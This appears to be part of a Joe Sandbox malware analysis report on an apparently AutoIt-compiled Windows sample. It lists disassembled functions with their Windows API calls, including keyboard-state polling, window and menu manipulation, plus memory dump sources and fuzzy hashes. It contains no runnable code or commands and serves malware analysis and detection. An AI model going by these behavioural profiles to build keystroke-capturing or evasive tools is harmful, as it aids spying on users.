                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                          • String ID: BUTTON
                                                                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                                                                          • Opcode ID: 111ca3ee716016d46dee65826525dc3f99434e2e16931173099bbbd3d6a08a54
                                                                                                                                                          • Instruction ID: 20c2f98465f90dbc39da44629c7feb8cab2fdc28ef8256ba1b5f7119d8b43894
                                                                                                                                                          • Opcode Fuzzy Hash: 111ca3ee716016d46dee65826525dc3f99434e2e16931173099bbbd3d6a08a54
                                                                                                                                                          • Instruction Fuzzy Hash: 562165B1244644BFE7135FA1ECCDA2A3B6AF716348B050214F5268BDA1CF724D959621
                                                                                                                                                          Function 001632B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00193C64,00000010,00000000,Bad directive syntax error,001BDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 001632D1
                                                                                                                                                          • LoadStringW.USER32(00000000,?,00193C64,00000010), ref: 001632D8
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • _wprintf.LIBCMT ref: 00163309
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016332B
                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00163395
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                          • API String ID: 1506413516-4153970271
                                                                                                                                                          • Opcode ID: b8a93c2b97689543f162dbec52cf55e60f979f37bc5605b85c5eb6f02ed2fbe7
                                                                                                                                                          • Instruction ID: 4fcd75109c85b3e43524b79ace51dbdf92ddc1f9022dc32da3dc997eac0a3ead
                                                                                                                                                          • Opcode Fuzzy Hash: b8a93c2b97689543f162dbec52cf55e60f979f37bc5605b85c5eb6f02ed2fbe7
                                                                                                                                                          • Instruction Fuzzy Hash: 93215131840219BBDF15EF90DC46EEE7735BF28700F004456F525A11A1EB75AAA8DB61
                                                                                                                                                          Function 001708D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3566271842-0
                                                                                                                                                          • Opcode ID: 190a18c82ff2c03f8255aa83c9f2c5090ee0e576d639df411a7cdfde43f19ba8
                                                                                                                                                          • Instruction ID: e57516fd610c8de5f470bff6d35d04eec74fe790b88c2a281196f74adf57dbc2
                                                                                                                                                          • Opcode Fuzzy Hash: 190a18c82ff2c03f8255aa83c9f2c5090ee0e576d639df411a7cdfde43f19ba8
                                                                                                                                                          • Instruction Fuzzy Hash: FF711D75A00229EFDB15EFA4D985ADEB7B8EF49314F048095E919EB261D730EE40CF90
                                                                                                                                                          Function 0016388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00163908
                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 00163973
                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00163993
                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 001639AA
                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 001639D9
                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 001639EA
                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00163A16
                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 00163A24
                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00163A4D
                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 00163A5B
                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00163A84
                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 00163A92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                          • Opcode ID: 1edae69362122b8b0f9604407d3f979b51578b593c146699622f13aa9d94070d
                                                                                                                                                          • Instruction ID: 460aaaaaefcf9ac9bf50b7de9c7f0ccfc3d541db0c5f9b95168a7ab368a49bf8
                                                                                                                                                          • Opcode Fuzzy Hash: 1edae69362122b8b0f9604407d3f979b51578b593c146699622f13aa9d94070d
                                                                                                                                                          • Instruction Fuzzy Hash: DE51D820A0878429FB35EBA48C117EABFF49F12384F08859DD5D25B5C3DB549B9CCB62
                                                                                                                                                          Function 0015FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0015FB19
                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0015FB2B
                                                                                                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0015FB89
                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 0015FB94
                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0015FBA6
                                                                                                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0015FBFC
                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0015FC0A
                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0015FC1B
                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0015FC5E
                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0015FC6C
                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0015FC89
                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0015FC96
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3096461208-0
                                                                                                                                                          • Opcode ID: 240f83cee8e5a6992f049e24f347da2bd3ad24da50fa9b02a8792b01a3f451fa
                                                                                                                                                          • Instruction ID: c67daeeaba43ca492399c7e75f5670e4d04c46562007ef8b7b9e0a6bc377e3cd
                                                                                                                                                          • Opcode Fuzzy Hash: 240f83cee8e5a6992f049e24f347da2bd3ad24da50fa9b02a8792b01a3f451fa
                                                                                                                                                          • Instruction Fuzzy Hash: 06513E71B00609EFDB08CF68DD95AAEBBBAEB89301F14813DB91AD7690D7709D458B10
                                                                                                                                                          Function 0013B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013B155: GetWindowLongW.USER32(?,000000EB), ref: 0013B166
                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0013B067
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                          • Opcode ID: 6b3463fc40a4dee987d2109f2304850ae86fae109e17345e6abca6cf3af5395e
                                                                                                                                                          • Instruction ID: 1263671d9112e910fd3b1d8eb6d22295dc898ddb757bd558349d657a37c12f20
                                                                                                                                                          • Opcode Fuzzy Hash: 6b3463fc40a4dee987d2109f2304850ae86fae109e17345e6abca6cf3af5395e
                                                                                                                                                          • Instruction Fuzzy Hash: AC418331104540AFDB249F28E898BBA37B5AB46731F184265FE768A5E5E7318C81DB21
                                                                                                                                                          Function 00167334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 136442275-0
                                                                                                                                                          • Opcode ID: 74de352961f0cbfdc28963441ccc7b9dd8ecfc8e5509ba6902222d2624e171ba
                                                                                                                                                          • Instruction ID: d96eaeaba45f441c11ceb12b37833c0f6f870937d5ce2819964e0c75ced86cfa
                                                                                                                                                          • Opcode Fuzzy Hash: 74de352961f0cbfdc28963441ccc7b9dd8ecfc8e5509ba6902222d2624e171ba
                                                                                                                                                          • Instruction Fuzzy Hash: A641FCB290412CAADB25EB50CC55EDE73BCAB58314F5041E6F519A3091EF71ABD8CFA0
                                                                                                                                                          Function 001284A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                          • __itow.LIBCMT ref: 00128519
                                                                                                                                                            • Part of subcall function 00142177: _xtow@16.LIBCMT ref: 00142198
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __itow__swprintf_xtow@16
                                                                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                                                                          • API String ID: 1502193981-2263619337
                                                                                                                                                          • Opcode ID: 09436614d22a2d86e660ed3d9f68c58bf605e6ad1aae30f3f19ae9f4f5818886
                                                                                                                                                          • Instruction ID: 8b44b6dd89993ed66ec794dbcd2ece2537da5acc7574417fb0d9decac17e1bc4
                                                                                                                                                          • Opcode Fuzzy Hash: 09436614d22a2d86e660ed3d9f68c58bf605e6ad1aae30f3f19ae9f4f5818886
                                                                                                                                                          • Instruction Fuzzy Hash: B94126716046159BEB29EF38E841F6A73E6BF58300F20446EE549D7292FB31DA51CB10
                                                                                                                                                          Function 00145C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00145CCA
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • __gmtime64_s.LIBCMT ref: 00145D63
                                                                                                                                                          • __gmtime64_s.LIBCMT ref: 00145D99
                                                                                                                                                          • __gmtime64_s.LIBCMT ref: 00145DB6
                                                                                                                                                          • __allrem.LIBCMT ref: 00145E0C
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00145E28
                                                                                                                                                          • __allrem.LIBCMT ref: 00145E3F
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00145E5D
                                                                                                                                                          • __allrem.LIBCMT ref: 00145E74
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00145E92
                                                                                                                                                          • __invoke_watson.LIBCMT ref: 00145F03
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 384356119-0
                                                                                                                                                          • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                          • Instruction ID: 08b74ff5e8c512be34a9baa03f6ad7dd018cb0f35d7273a3b909eb37796b6e42
                                                                                                                                                          • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                          • Instruction Fuzzy Hash: D3710D72A01F16ABD714DF78CC81B6AB3BAAF24764F144139F910EB692E770DE408790
                                                                                                                                                          Function 001657FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 00165816
                                                                                                                                                          • GetMenuItemInfoW.USER32(001E18F0,000000FF,00000000,00000030), ref: 00165877
                                                                                                                                                          • SetMenuItemInfoW.USER32(001E18F0,00000004,00000000,00000030), ref: 001658AD
                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 001658BF
                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 00165903
                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0016591F
                                                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00165949
                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 0016598E
                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001659D4
                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001659E8
                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00165A09
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4176008265-0
                                                                                                                                                          • Opcode ID: cdd4c3e9d8b003ca79bc0b737507b319eed9fac6d864bfc8a03fba586abf11af
                                                                                                                                                          • Instruction ID: 6861df0e5a456531663ee68736c40cb34297d5a3f50393bdae3569f9be940c90
                                                                                                                                                          • Opcode Fuzzy Hash: cdd4c3e9d8b003ca79bc0b737507b319eed9fac6d864bfc8a03fba586abf11af
                                                                                                                                                          • Instruction Fuzzy Hash: C361C070900A89EFDF21CFA4DC88EBE7BBAEB05358F140159F442A7651D731AD61CB21
                                                                                                                                                          Function 00189A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00189AA5
                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00189AA8
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00189ACC
                                                                                                                                                          • _memset.LIBCMT ref: 00189ADD
                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00189AEF
                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00189B67
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
